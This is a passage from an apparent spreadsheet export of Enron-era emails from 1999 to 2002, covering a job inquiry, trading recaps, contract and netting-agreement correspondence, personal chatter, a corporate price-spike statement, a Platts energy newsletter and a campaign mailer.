with the government affairs group and believe that a part time position in _x000D_
the Enron DC office will be complementary to my studies at SAIS. Rick Shapiro _x000D_
encouraged me to contact you directly, suggesting that you might be willing _x000D_
to meet with me and to help me identify the employment opportunities in the _x000D_
DC office._x000D_
_x000D_
It may be helpful for you to know that I have been working for the past two _x000D_
year for Enron. While in Houston, I had the chance to work on number of _x000D_
interesting projects, including providing financial modeling support for the _x000D_
former Enron International group.  I am familiar with deregulation process, _x000D_
especially with the recent developments in the telecommunication field.   In _x000D_
addition, working in the London office have provided me with the opportunity _x000D_
to working with the EU Commission, the UK Parliament and other lobbying _x000D_
groups.  I believe that my experience in Enron will enable me to play a _x000D_
proactive role in the DC office.   _x000D_
_x000D_
I will be in touch with you by phone in a week.  Next month, I will be _x000D_
passing through DC &amp; would like to set up a short 20-30 minute meeting with _x000D_
you at a mutually convenient time. _x000D_
_x000D_
I understand you are busy and appreciate your time. I look forward to talking _x000D_
with you soon._x000D_
_x000D_
Sincerely,_x000D_
_x000D_
_x000D_
Xi Xi_x000D_
Enron Regulatory &amp; Government Affairs_x000D_
40 Grosvenor Place_x000D_
London SW1X 7EN_x000D_
+44 (0)207 783 2514 office_x000D_
+44 (0)207 783 1640 fax_x000D_
+44 (0)777 092 5042 cellular_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 8 Jun 2000 01:39:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'michael.burke@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'cutty.cunningham@enron.com'})</t>
  </si>
  <si>
    <t>Communications with Regional Business Managers</t>
  </si>
  <si>
    <t>Cutty, I know you are extremely busy, but as you continue to work with Phil _x000D_
Lowry on the new initiatives we have discussed,_x000D_
please redouble your efforts to keep in close communication with the Regional _x000D_
business leadership.  It would also be a_x000D_
great idea if you visited the EOTT trading floor at least once a day , every _x000D_
day you are in Houston.  You are off to a great start in _x000D_
developing rapport with the commercial group, so continue to build on those _x000D_
relationships.  Thanks for all you are doing on so many fronts.  EOTT is very _x000D_
fortunate to have you on are leadership team!</t>
  </si>
  <si>
    <t>Mon, 18 Dec 2000 00:31:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Gasmart/Power 2001</t>
  </si>
  <si>
    <t>No interest</t>
  </si>
  <si>
    <t>Wed, 19 Dec 2001 15:35:22 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'andrea.woodland@enron.com'})</t>
  </si>
  <si>
    <t>Smurfit-Stone</t>
  </si>
  <si>
    <t>Sean,_x000D_
_x000D_
Smurfit-Stone has terminated their power contract with us (letter to Enron legal).  So take them off your list for deliver.  They will more than likely end up paying a termination payment, but they are going out now to lock in the power they need under new agreements._x000D_
_x000D_
Thanks._x000D_
Andrea</t>
  </si>
  <si>
    <t>Wed, 23 Jun 1999 03:00:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Continental Offers 20% Discount On Theatre Tickets To One...</t>
  </si>
  <si>
    <t xml:space="preserve">When do I get to see you?  What are you doing for the fourth?  When are you _x000D_
going to visit Miami?  When do you want to eat sushi?  SS_x000D_
_x000D_
_x000D_
From: "Yao Apasu/ENRON_DEVELOPMENT" AT ENRON_DEVELOPMENT@CCMAIL on 06/23/99 _x000D_
09:12 AM_x000D_
To: Sara Shackleton@ECT_x000D_
cc:  _x000D_
Subject: Continental Offers 20% Discount On Theatre Tickets To One..._x000D_
_x000D_
_x000D_
Subject:_x000D_
Continental Offers 20% Discount On Theatre Tickets To OnePass Members_x000D_
---------------------------------_x000D_
_x000D_
_x000D_
Hi Beautiful,_x000D_
Top of the morning to you._x000D_
_x000D_
Yao_x000D_
_x000D_
---------------------- Forwarded by Yao Apasu/ENRON_DEVELOPMENT on 06/23/99_x000D_
09:10 AM ---------------------------_x000D_
_x000D_
_x000D_
onepass@opsc.flycontinental.com on 06/22/99 05:30:29 PM_x000D_
_x000D_
To:   Yao Apasu/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
cc:_x000D_
Subject:  Continental Offers 20% Discount On Theatre Tickets To OnePass_x000D_
Members_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Continental Airlines and PACE Theatrical Group are pleased to offer OnePass _x000D_
members a 20% ticket discount on all ticket levels for the preview _x000D_
performances of the Tony Award-winning Broadway musical masterpiece, _x000D_
Ragtime.  The show is coming to Houston's Jones Hall, with the special _x000D_
preview performances showing July 31 and August 1.  Ragtime tells the _x000D_
remarkable story of three American families at the beginning of the Twentieth _x000D_
Century whose lives become dramatically intertwined as they are caught up in _x000D_
the events of a young, turbulent country._x000D_
_x000D_
To redeem this special discount opportunity, OnePass members should call _x000D_
Ticketmaster at 713-629-3700 and mention ticket type code "L-type". _x000D_
Continental is the official and exclusive airline of the Houston MasterCard _x000D_
Broadway Series._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 30 May 2001 03:38:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: LIMO</t>
  </si>
  <si>
    <t xml:space="preserve">200 is late enough for anyone to be out.  I'm all for the limo taking people _x000D_
home at that time._x000D_
_x000D_
I am concerned about Michael AND about imposing on Donnie and Lynn.  Are you _x000D_
taking Friday off?_x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Neil Mann" &lt;nmann@erac.com&gt; on 05/30/2001 10:29:58 AM_x000D_
Please respond to &lt;nmann@erac.com&gt;_x000D_
To: &lt;Kay.Mann@enron.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: RE: LIMO_x000D_
_x000D_
I called Mikey and asked what was the latest he thought the limo would be_x000D_
needed. He said 3:30. I asked if 2am worked and he said absolutely. He also_x000D_
said he didn't think it mattered to Paige if it was an SUV or a standard_x000D_
limo. So what do you think, SUV or standard limo?_x000D_
_x000D_
I'm not sure what you mean about how to balance Michael. I know I'm_x000D_
concerned about him getting up early and wanting to go home. That would not_x000D_
be a good thing. This party is for and about Paige, and you too. I want the_x000D_
two of you to be able to share this time with out you being concern about_x000D_
Michael. I will be in charge of Michael Friday morning. I don't mind sitting_x000D_
second chair so to speak. What do you think?_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Kay.Mann@enron.com [mailto:Kay.Mann@enron.com]_x000D_
Sent: Wednesday, May 30, 2001 9:45 AM_x000D_
To: nmann@erac.com_x000D_
Subject: RE: LIMO_x000D_
_x000D_
_x000D_
_x000D_
SUV for 14.  It is ok with me if we have it until 2.  We need to talk how_x000D_
to balance Michael, etc._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Neil Mann" &lt;nmann@erac.com&gt; on 05/30/2001 09:46:35 AM_x000D_
_x000D_
Please respond to &lt;nmann@erac.com&gt;_x000D_
_x000D_
To:   &lt;Kay.Mann@enron.com&gt;_x000D_
cc:_x000D_
_x000D_
Subject:  RE: LIMO_x000D_
_x000D_
working on it now..._x000D_
Thurs 6/7 6pm to midnight it's looking like..._x000D_
For an SUV 14 passenger it's going to be about $750.00_x000D_
For a std 12 passenger limo it's going to be about $590.00_x000D_
Any thoughts..._x000D_
_x000D_
-----Original Message-----_x000D_
From: Kay.Mann@enron.com [mailto:Kay.Mann@enron.com]_x000D_
Sent: Wednesday, May 30, 2001 9:14 AM_x000D_
To: nmann@erac.com_x000D_
Subject: LIMO_x000D_
_x000D_
_x000D_
A friendly reminder._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 19 Mar 2002 10:07:50 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'frankjwil@yahoo.com'})</t>
  </si>
  <si>
    <t>*EMCA* General Contractor Recommendation</t>
  </si>
  <si>
    <t xml:space="preserve">If you're looking for a reasonable, reliable general contractor_x000D_
with lots of experience in everything from carpentry, tile, fencing,_x000D_
plumbing, electrical, painting, to additions or remodeling call Ray _x000D_
Fedor 281-536-4552.  Old houses are his speciality._x000D_
_x000D_
He should be added to our list of recommended contractors._x000D_
_x000D_
Frank Williams_x000D_
713-526-3518_x000D_
6xx Willard _x000D_
_x000D_
_x000D_
------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;_x000D_
FREE COLLEGE MONEY_x000D_
CLICK HERE to search_x000D_
600,000 scholarships!_x000D_
http://us.click.yahoo.com/iZp8OC/4m7CAA/ySSFAA/NoOolB/TM_x000D_
---------------------------------------------------------------------~-&gt;_x000D_
_x000D_
To unsubscribe from this group, send an email to:_x000D_
emca-unsubscribe@egroups.com_x000D_
_x000D_
 _x000D_
_x000D_
Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ _x000D_
</t>
  </si>
  <si>
    <t>Tue, 27 Jun 2000 09:57:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Hunter,_x000D_
_x000D_
Per your request._x000D_
_x000D_
1.)  Traded the Gulf Coast region starting in Sept/Oct 1999._x000D_
       -  Developed valuable customer relationships_x000D_
       -  Managed Gulf position with Tom Donahoe_x000D_
       -  Gulf book was profitable during this time period._x000D_
_x000D_
2.)  Moved to Market Book in January 2000._x000D_
       -   Responsible for trading Michigan and Wisconsin markets_x000D_
       -   Managed Market Book w/ Patrice Thurston._x000D_
       -   Market book is profitable_x000D_
_x000D_
3.)  Managed own book starting in May 2000._x000D_
       -  More than doubled daily volume traded in both Michcon_x000D_
           and Consumers._x000D_
       -  Developed and managed multiple products on EOL including_x000D_
            --&gt;  Physical forwards_x000D_
            --&gt;  Gas Daily Swaps_x000D_
            --&gt;  Physical Basis Swaps_x000D_
            --&gt;  Physical Index _x000D_
      -  Michigan Market Book is profitable_x000D_
_x000D_
4,)  Prior to joining Gas Trading I worked in Power Structuring where I was _x000D_
involved in_x000D_
      -  Asset Valuation_x000D_
      -  Commodity/Option Pricing_x000D_
_x000D_
_x000D_
Let me know if you need anything else.  _x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kevin</t>
  </si>
  <si>
    <t>Wed, 21 Nov 2001 08:18:06 -0800 (PST)</t>
  </si>
  <si>
    <t>sure, are you really italian?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Nelson, Michelle  _x000D_
Sent:	Wednesday, November 21, 2001 10:17 AM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
i'm italian too.  and no i don't watch that.  so will you make them disappear?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Wednesday, November 21, 2001 10:16 AM_x000D_
To:	Nelson, Michelle_x000D_
Subject:	RE: _x000D_
_x000D_
im an italian from new jersey, of course i can make them disappear, dont you watch the sopronos_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Nelson, Michelle  _x000D_
Sent:	Wednesday, November 21, 2001 10:14 AM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
i was playing.  wade is irritating me.  can you make my in-laws disappear?  so, i'm bored and i want to cry!  :)_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Wednesday, November 21, 2001 10:13 AM_x000D_
To:	Nelson, Michelle_x000D_
Subject:	RE: _x000D_
_x000D_
what do you mean_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Nelson, Michelle  _x000D_
Sent:	Wednesday, November 21, 2001 10:11 AM_x000D_
To:	Maggi, Mike_x000D_
Subject:	_x000D_
_x000D_
so can you give me the name of sarah's lawyer?</t>
  </si>
  <si>
    <t>Tue, 3 Aug 1999 04:49:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>=?ANSI_X3.4-1968?Q?Statements_concerning_last_week=01,s_price_spike?=</t>
  </si>
  <si>
    <t xml:space="preserve"> In Monday=01,s Executive Committee meeting we discussed the need for a com=_x000D_
mon=20_x000D_
statement to use in response to questions about last week=01,s power price=_x000D_
=20_x000D_
spikes and Enron=01,s performance.  That statement follows.  Media inquirie=_x000D_
s, as=20_x000D_
always, should be referred to Mark Palmer (ext. 3-4738)._x000D_
_x000D_
=01&amp;We are fully performing on all of our commitments. Many of the facts ar=_x000D_
e=20_x000D_
still being gathered.  This information will determine, in part, our=20_x000D_
contractual commitments.*  Accordingly, discussion are ongoing with certain=_x000D_
=20_x000D_
of our counterparties to determine our obligations and the proper course of=_x000D_
=20_x000D_
action.  We are and will continue to be in regular contact with customers. =_x000D_
=20_x000D_
We have made various arrangements with our customers to address the recent=_x000D_
=20_x000D_
price spike including purchasing (or arranging to purchase) power for them=_x000D_
=20_x000D_
or, in some cases, purchasing our obligations back from them directly._x000D_
_x000D_
We do not publicly discuss daily or weekly financial performance of specifi=_x000D_
c=20_x000D_
businesses.  However, we operate our power business, as we do all other=20_x000D_
commercial functions, within strict, Board-directed value at risk limits. =_x000D_
=20_x000D_
Our focus is on maintaining a balanced portfolio and not =01&amp;swinging for t=_x000D_
he=20_x000D_
fences=018 during periods of volatility.=018_x000D_
_x000D_
_x000D_
_x000D_
 *Many of the facts are still being gathered.  This information will=20_x000D_
determine, in part, our contractual commitments.  Accordingly, discussion a=_x000D_
re=20_x000D_
ongoing with certain of our counterparties to determine our obligations and=_x000D_
=20_x000D_
the proper course of action.</t>
  </si>
  <si>
    <t>Thu, 18 Oct 2001 06:22:46 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'sanforchuckie@aol.com'})</t>
  </si>
  <si>
    <t>Undeliverable: Mom's funeral expenses</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
--------- Inline attachment follows ---------_x000D_
_x000D_
From:  &lt;/O=ENRON/OU=NA/CN=RECIPIENTS/CN=SPANUS&gt;_x000D_
To: &lt;sanforchuckie@aol.com&gt; &lt;??S&lt;sanforchuckie@aol.com&gt;&gt;, &lt;trajjen@yahoo.com&gt; &lt;??S&lt;trajjen@yahoo.com&gt;&gt;_x000D_
CC: &lt;mr1drfl@swbell.net&gt; &lt;??S&lt;mr1drfl@swbell.net&gt;&gt;_x000D_
Date: Thursday, October 18, 2001 1:21:42 GMT_x000D_
Subject: _x000D_
_x000D_
Attached is a list of the funeral and other related expenses._x000D_
_x000D_
 &lt;&lt;Mom's expenses.doc&gt;&gt;_x000D_
_x000D_
Stephanie Panus_x000D_
Senior Legal Specialist_x000D_
Enron Wholesale Services_x000D_
1400 Smith Street, EB3803C_x000D_
Houston, Texas  77002_x000D_
ph:  713.345.3249_x000D_
fax:  713.646.3490_x000D_
email:  stephanie.panus@enron.com_x000D_
_x000D_
_x000D_
_x000D_
**********************************************************************_x000D_
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_x000D_
**********************************************************************_x000D_
 - Mom's expenses.doc </t>
  </si>
  <si>
    <t>Wed, 28 Nov 2001 12:29:07 -0800 (PST)</t>
  </si>
  <si>
    <t>Fw: NYMEX intraday call</t>
  </si>
  <si>
    <t>Sara - I do not have Bill Bradford's email but would like to ask you the favor to forward this to him please.  Thanks, Sarah_x000D_
Sarah Wesner_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Wesner-Soong, Sarah &lt;Sarah.Wesner@ENRON.com&gt;_x000D_
To: Shackleton, Sara &lt;Sara.Shackleton@ENRON.com&gt;_x000D_
CC: Warwick, Todd &lt;Todd.Warwick@ENRON.com&gt;_x000D_
Sent: Wed Nov 28 14:27:34 2001_x000D_
Subject: Fw: NYMEX intraday call_x000D_
_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
To: Joe Deffner_x000D_
Sent: Nov 28, 2001 2:24p_x000D_
Subject: NYMEX intraday call_x000D_
_x000D_
According to one of our brokers, NYMEX raised ENE margins by another 200%.  I have not seen any documentation because I am stuck in jury duty but jst wanted to keep you informed._x000D_
Sarah Wesner</t>
  </si>
  <si>
    <t>Tue, 8 May 2001 05:01:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>fpl deal</t>
  </si>
  <si>
    <t xml:space="preserve">listed below are fpl requirements and ena's obligations_x000D_
  requirement  obligations_x000D_
_x000D_
9  3400   3400_x000D_
10  3400   3400_x000D_
11  3400   3400_x000D_
12  3400   3400_x000D_
13  5800   3400_x000D_
14  33000   3400_x000D_
15-31  33000   33000_x000D_
_x000D_
bill's phone number is 561-625-7090_x000D_
</t>
  </si>
  <si>
    <t>Fri, 9 Nov 2001 14:27:06 -0800 (PST)</t>
  </si>
  <si>
    <t>Revised Dynegy-Enron Master Netting Agreement</t>
  </si>
  <si>
    <t xml:space="preserve">Please contact me with any comments at your earliest convenieince._x000D_
_x000D_
 _x000D_
_x000D_
Thanks,_x000D_
_x000D_
Harlan E. Murphy_x000D_
Enron Wholesale Services - Legal_x000D_
1400 Smith Street, EB 3811_x000D_
Houston, Texas 77002_x000D_
Tel: 713.345.2679_x000D_
Fax: 713.646.3490_x000D_
E-mail: Harlan.Murphy@Enron.com_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Ernie.Kohnke@dynegy.com@ENRON  _x000D_
Sent:	Friday, November 09, 2001 3:07 PM_x000D_
To:	Murphy, Harlan_x000D_
Cc:	John.C.Herbert@dynegy.com_x000D_
Subject:	Revised Agreements_x000D_
Importance:	High_x000D_
_x000D_
Har,_x000D_
_x000D_
As requested, I have attached the agreements in redline and in final.  I am_x000D_
turning my attention to the Guaranty Agreements._x000D_
_x000D_
Not to beat a dead horse, and as John also mentioned, we will not accept_x000D_
changes to this Master Agreement that alter the terms and conditions of the_x000D_
Underlying Master Agreements.  At a later date, we will be happy to_x000D_
negotiate in good faith concerning whether it would be mutually agreeable_x000D_
to amend those Underlying Master Agreements.  This Master Setoff Agreement_x000D_
is simply not the vehicle in which to accomplish that goal._x000D_
_x000D_
Regarding any concerns that this Master Agreement may not be enforceable in_x000D_
Europe (or because it covers various Underlying Master Agreements for deals_x000D_
in Europe), please note that Section 13 provides severability language that_x000D_
should operate to carve out the European agreements that might otherwise_x000D_
create enforceability problems.  Therefore, our approach has been to_x000D_
include them since your colleagues have acknowledged that they do not know_x000D_
whether there would be enforceability problems in Europe._x000D_
_x000D_
I look forward to discussing this final document with you at your earliest_x000D_
convenience.  I will be seeking signatures from Pryor at 3:30._x000D_
_x000D_
Thanks._x000D_
_x000D_
Ernie_x000D_
_x000D_
(See attached file: Enron Mstr Net 11-9 Redline.doc)(See attached file:_x000D_
Enron Mstr Net 11-9 Final.doc)_x000D_
 - Enron Mstr Net 11-9 Redline.doc &lt;&lt; File: Enron Mstr Net 11-9 Redline.doc &gt;&gt; _x000D_
 - Enron Mstr Net 11-9 Final.doc &lt;&lt; File: Enron Mstr Net 11-9 Final.doc &gt;&gt; </t>
  </si>
  <si>
    <t>Wed, 26 Sep 2001 07:03:15 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'nancyh@gmu.edu'})</t>
  </si>
  <si>
    <t>Server Error</t>
  </si>
  <si>
    <t>This is the message I'm getting when I try to access the FERC website._x000D_
Shelley Corman_x000D_
Enron_x000D_
713-853-7083_x000D_
Internal Server Error_x000D_
The server encountered an internal error or misconfiguration and was unable to complete your request. _x000D_
Please contact the server administrator, nancyh@gmu.edu and inform them of the time the error occurred, and anything you might have done that may have caused the error. _x000D_
More information about this error may be available in the server error log. _x000D_
_x000D_
Apache/1.3.19 Server at www.gmu.edu Port 80</t>
  </si>
  <si>
    <t>Thu, 28 Feb 2002 09:42:21 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
Platts Energy Bulletin_x000D_
_x000D_
_x000D_
_x000D_
The daily Energy Bulletin is a showcase of the top headlines posted on_x000D_
platts.com (http://www.platts.com) over the past 24 hours. To view this file in_x000D_
html, open the attachment at the bottom of this email. We welcome your feedback_x000D_
- send your comments to feedback@platts.com. Instructions for unsubscribing can_x000D_
be found at the bottom of each issue._x000D_
_x000D_
February 28, 2002_x000D_
_x000D_
What's New on platts.com?_x000D_
Green Certificates: A developing market: Green certificates are increasingly_x000D_
seen by governments around the world as a means to support renewable energy_x000D_
production. Read about the different schemes in place around the world._x000D_
(http://www.platts.com/features/greencertificates/index.shtml)_x000D_
_x000D_
Platts Enron Report: Read about the implications of Enron's bankruptcy on the_x000D_
financial and energy communities._x000D_
(http://www.platts.com/features/enron/index.shtml)_x000D_
_x000D_
Quote of the Day: A selection of industry/OPEC viewpoints._x000D_
(http://www.platts.com/quote.shtml)_x000D_
_x000D_
_x000D_
_x000D_
Advertisement:_x000D_
Platts Global Energy Jobs Board and Resume Bank: Created in partnership with the_x000D_
Energy Jobs Network, the Jobs Board gives you access to a pool of job seekers_x000D_
and open positions across the energy industry. It's free for all job seekers,_x000D_
and there is a range of packages for employers posting jobs._x000D_
(http://www.energyjobsnetwork.com/home.asp?code=platts)_x000D_
_x000D_
Futures Round-up_x000D_
_x000D_
NYMEX: Products to open higher, focus on expiration_x000D_
NYMEX April crude oil is called to open 16 cts higher at $21.45/bbl Thursday._x000D_
April Brent is called to open 24 cts higher at $21.09/bbl. March heating oil is_x000D_
called to open 61 pts higher at 56.00 cts/gal and March unleaded gasoline is_x000D_
called to open 90 pts higher at 59.30 cts/gal._x000D_
_x000D_
IPE Brent Focus: IPE Brent crude finds renewed strength Thursday_x000D_
At 1109 GMT, front-month April Brent stood at $21.19/bbl, up from Wednesday's_x000D_
close at $20.85/bbl. Prices remained stable following Wednesday's move higher on_x000D_
the back of bullish US DOE statistics. Prices drifted lower Wednesday having_x000D_
reached a high $20.32/bbl, but futures remained firm in early business Thursday._x000D_
_x000D_
_x000D_
_x000D_
News Round-up_x000D_
Click on the headlines below or paste the URLs provided in your internet browser_x000D_
to see the full story._x000D_
_x000D_
OIL:_x000D_
OPEC's Lukman, Rodriguez to head to Moscow Sunday_x000D_
OPEC's two top officials are set to travel to Moscow Sunday to ask Russia to_x000D_
maintain its oil export curbs through the second quarter alongside the_x000D_
producers' cartel and four other independent producers, an OPEC spokesman said_x000D_
Thursday. (http://www.platts.com/archives.shtml#59512)_x000D_
_x000D_
NATURAL GAS:_x000D_
German Cartel Office blocks E.ON takeover of Bergemann_x000D_
Germany's cartel office has prohibited energy giant E.ON's takeover of gas_x000D_
intermediary Bergemann, blocking the utility's goal of gaining ultimate control_x000D_
of Germany's leading intermediary, the cartel office said Thursday._x000D_
(http://www.platts.com/archives.shtml#57291)_x000D_
_x000D_
PETROCHEMICALS:_x000D_
Japan exhausts 65% of GSP polymer import quota: MoF_x000D_
With just two months left in fiscal 2001 (Apr 1, 2001 to Mar 31, 2002), Japan as_x000D_
of January has exhausted 65% of its annual import quota for polymers subject to_x000D_
preferentially low tariffs under the WTO's Generalized System of Preferences_x000D_
scheme, an official at the Ministry of Finance said Thursday._x000D_
(http://www.platts.com/archives.shtml#59493)_x000D_
_x000D_
Advertisement:_x000D_
Primedia Workplace Learning: Now you can deliver comprehensive, industrial_x000D_
maintenance training to your technicians -- anytime, anywhere. PRIMEDIA_x000D_
Workplace Learning's Web-based maintenance training features world-renowned NUS_x000D_
Training (TM) content plus powerful records-management tools, saving you both_x000D_
time and money. View our 4-minute online demo: http://216.92.125.24/pri2.htm_x000D_
(http://216.92.125.24/pri2.htm)._x000D_
_x000D_
ELECTRIC POWER:_x000D_
IPE considering suspension of UK power baseload futures_x000D_
The UK's International Petroleum Exchange is to consider suspending its UK_x000D_
electricity baseload futures contract due to low volumes, it said Thursday._x000D_
(http://www.platts.com/archives.shtml#57305)_x000D_
_x000D_
NUCLEAR:_x000D_
Few technical agreements on Yucca Mt. repository require long-term testing, DOE_x000D_
says_x000D_
Only eight of the 293 technical agreements DOE has with NRC would require_x000D_
long-term confirmatory tests at a repository at Yucca Mountain, Nevada, DOE's_x000D_
April Gil said Thursday. (http://www.platts.com/archives.shtml#59485)_x000D_
_x000D_
COAL:_x000D_
EEI: Streamline power plant permitting_x000D_
Edison Electric Institute's Alliance of Energy Suppliers is now offering a_x000D_
series of guidebooks to "help developers save time and money in gaining state_x000D_
approval for permitting a fossil fuel power plant."_x000D_
(http://www.platts.com/archives.shtml#59488)_x000D_
_x000D_
BANDWIDTH:_x000D_
Enron, Williams, Montana Power partnership dealt extensively in swaps to build_x000D_
fiber network_x000D_
Anxious to accelerate its entry into the broadband arena, Enron Corp in_x000D_
September 1997 formed a partnership with the telecommunications units of The_x000D_
Williams Companies and Montana Power Co that set out to swap its way into_x000D_
building the western segment of what would eventually grow into a nationwide_x000D_
network. (http://www.platts.com/bandwidth/index.shtml)_x000D_
_x000D_
To see the past five day's headlines posted on platts.com_x000D_
go to Platts archives (http://www.platts.com/archives.shtml)._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Upcoming Events:_x000D_
_x000D_
Platts Policies and Methodology Forum, Platts will hold an open forum to discuss_x000D_
its policies and methodologies on Sunday, March 17 at the Marriott Rivercenter_x000D_
Hotel in San Antonio, Texas. The forum will be held in conjunction with the_x000D_
annual meeting of the National Petroleum Refiners' Association. For further_x000D_
details and to register go to_x000D_
http://www.platts.com/oil/SanAntonioForum/sanantonioforumregister.shtml_x000D_
_x000D_
4th Annual ELECTRIC POWER Conference &amp; Exhibition, "Where the Operating_x000D_
Companies Meet", Over 10 co-located events, 500 exhibiting companies and 6,000+_x000D_
attendees. March 19-21, 2002, America's Center, St. Louis, Missouri. Organized_x000D_
by The TradeFair Group, and Sponsored by POWER Magazine and Platts._x000D_
(http://www.electricpowerexpo.com/currentshow/home.asp)_x000D_
_x000D_
"Grid Business: The Midwest," an Electrical World Roundtable in cooperation with_x000D_
R.J. Rudden Associates and the United States Energy Association. March 20-21,_x000D_
2002, in St. Louis, Missouri._x000D_
(http://www.platts.com/gridbusiness/index.html)_x000D_
_x000D_
"Navigating the Perfect Storm: Charting Power Generation Success," the 17th_x000D_
Annual Global Power Markets Conference. March 24-26, 2002, in New Orleans._x000D_
(http://www.platts.com/electricpower/GPMConf2002/index.shtml)_x000D_
_x000D_
_x000D_
_x000D_
Advertisement:_x000D_
Platts Global Energy Buyers' Guide: The Buyers' Guide encompasses thousands of_x000D_
products and services needed worldwide by companies involved in the generation_x000D_
and delivery of electric power and its related services. It is a dynamic_x000D_
information service, updated daily as companies enter the market, merge or_x000D_
change their product/service offerings._x000D_
(http://www.mediabrains.com/client/platts/bg1/search.asp)_x000D_
_x000D_
PLATTS' MAGAZINES:_x000D_
_x000D_
Global Energy Business - Top 250 Energy Companies_x000D_
The first annual survey by Global Energy Business of financial performance for_x000D_
leading energy companies worldwide presents year 2000 data--assets, revenues,_x000D_
profits, earnings per share, and return on invested capital--for firms with_x000D_
assets exceeding $2 billion. Data were supplied by Standard &amp; Poor's, a unit of_x000D_
The McGraw-Hill Companies, New York, from its Compustat data base._x000D_
(http://www.platts.com/business/issues/0201/0201geb_top250.shtml)_x000D_
_x000D_
_x000D_
_x000D_
Want more information on Platts products? Browse the Platts Infostore at_x000D_
http://www.platts.com/mhe_infostore/cgi-bin/infostore._x000D_
_x000D_
You can also email Platts sales team at info@platts.com or check for the details_x000D_
of your nearest sales representative in our list of Platts offices at_x000D_
http://www.platts.com/about/offices.shtml._x000D_
_x000D_
To email an editor, click on_x000D_
http://www.platts.com/oil/editorialquestions.shtml?EnergyBulletin._x000D_
_x000D_
For information on how to advertise on the Platts Energy Bulletin or on_x000D_
platts.com contact josie_parnell@platts.com._x000D_
_x000D_
_x000D_
_x000D_
To unsubscribe from the Energy Bulletin, please click here and complete the_x000D_
'UnSubscribe" form._x000D_
(http://platts1.platts.com/cgi-bin/register/register.cgi?submit=UnSubscribeForm)_x000D_
You should receive a response telling you that you have been unsubscribed. If_x000D_
you are experiencing problems, email us at feedback@platts.com._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 16 Mar 2001 07:49:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Basis Swpation</t>
  </si>
  <si>
    <t>John:_x000D_
I think I like the approach you took in your first spreadsheet. Note that the _x000D_
spread option model takes rates expressed as continious rates. That is not _x000D_
consistent with the rates we have on our AA curves._x000D_
I suggest you change to your original valuation._x000D_
Thanks_x000D_
Paulo Issler</t>
  </si>
  <si>
    <t>Thu, 18 Oct 2001 14:56:51 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'volunteers@mcgreevey2001.org'})</t>
  </si>
  <si>
    <t>The Next Debate!</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
On Thursday, October 18th, Jim McGreevey will once again show New Jerseyans _x000D_
why he is the right choice for Governor._x000D_
_x000D_
The third debate between McGreevey and Schundler is set for Thursday night, _x000D_
at 8:00 on Channel 8 (CN8). It will take place at Rowan University and will _x000D_
be televised live._x000D_
_x000D_
After the debate, you can show your support for Jim McGreevey.  Here are _x000D_
three things you can do:_x000D_
_x000D_
1.  Immediately after the debate on CN8, from 9:00-10:00 pm, call into "It's _x000D_
Your Call With Lynn Doyle." The topic of the show will be the debates. _x000D_
1-877-268-5483._x000D_
_x000D_
2.  Check the CN8 website as they will probably have a daily poll asking _x000D_
viewers which candidate won the debate. www.cn8.com_x000D_
_x000D_
3.  Listen to the radio before and after the debate, 101.5FM and call in _x000D_
whenever they are talking about the candidates.  1-800-283-1015_x000D_
_x000D_
It is important for all of us to remind listeners and viewers that Bret _x000D_
Schundler wants to take $600 million away from public schools for a private _x000D_
school network, allow people to carry concealed weapons in our communities _x000D_
and take away a woman's right to choose, even in the cases of rape and _x000D_
incest._x000D_
*****_x000D_
Paid for by McGreevey for Governor 2001, Inc._x000D_
Fights for New Jersey. Right for New Jersey._x000D_
*****_x000D_
_x000D_
You have been sent this email because you or someone you know registered _x000D_
with our email distribution list.  If you have received this message in _x000D_
error,_x000D_
please reply to this email or write to jim@mcgreevey.org with "unsubscribe" _x000D_
in the subject line._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sun, 12 Mar 2000 14:37:00 -0800 (PST)</t>
